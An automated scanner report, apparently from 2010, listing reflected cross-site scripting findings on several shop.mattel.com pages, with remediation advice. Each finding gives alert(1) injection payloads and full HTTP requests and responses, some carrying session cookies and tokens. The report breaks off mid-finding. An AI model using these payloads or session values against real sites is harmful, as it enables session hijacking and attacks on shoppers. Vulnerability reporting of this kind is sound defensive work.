Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/affiliate/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0809"-alert(1)-"1880324d77a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate/index.jsp?b0809"-alert(1)-"1880324d77a=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:27 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 38154
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.2. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/affiliate/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e87b--><script>alert(1)</script>1e6ec6e0f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /affiliate/index.jsp?5e87b--><script>alert(1)</script>1e6ec6e0f69=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:28 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 38196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <!-- === Request Query String: 5e87b--><script>alert(1)</script>1e6ec6e0f69=1 --> ...[SNIP]...
The value of the categoryId request parameter is copied into an HTML comment. The payload 43c97--><script>alert(1)</script>e030957103d was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /brand/index.jsp?categoryId=376813143c97--><script>alert(1)</script>e030957103d HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:12 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 31245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <!-- === Request Query String: categoryId=376813143c97--><script>alert(1)</script>e030957103d --> ...[SNIP]...
The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da6d"-alert(1)-"8a42c67e1e8 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /brand/index.jsp?categoryId=37681313da6d"-alert(1)-"8a42c67e1e8 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:11 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 31213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.5. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/brand/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a0b95--><script>alert(1)</script>cbd1ff41310 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /brand/index.jsp?a0b95--><script>alert(1)</script>cbd1ff41310=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:07 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 35911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <!-- === Request Query String: a0b95--><script>alert(1)</script>cbd1ff41310=1 --> ...[SNIP]...
1.6. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/brand/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aee"-alert(1)-"f0867c1b267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /brand/index.jsp?92aee"-alert(1)-"f0867c1b267=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:07 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 35879
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.7. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/cart/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5088e"-alert(1)-"9c6b25295b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cart/index.jsp?5088e"-alert(1)-"9c6b25295b4=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:34 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 38137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.8. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/cart/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b30d3--><script>alert(1)</script>0933ae012e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cart/index.jsp?b30d3--><script>alert(1)</script>0933ae012e0=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:35 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Content-Language: es-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 38759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the categoryId request parameter is copied into an HTML comment. The payload e6697--><script>alert(1)</script>c56b49c6298 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /category/index.jsp?categoryId=3718115e6697--><script>alert(1)</script>c56b49c6298 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fed3"-alert(1)-"651a9d93d41 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/index.jsp?categoryId=37181155fed3"-alert(1)-"651a9d93d41 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f001c"-alert(1)-"119cc5f951e was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741284f001c"-alert(1)-"119cc5f951e HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the jsessionid request parameter is copied into an HTML comment. The payload 68cfa--><script>alert(1)</script>ace09a66a83 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
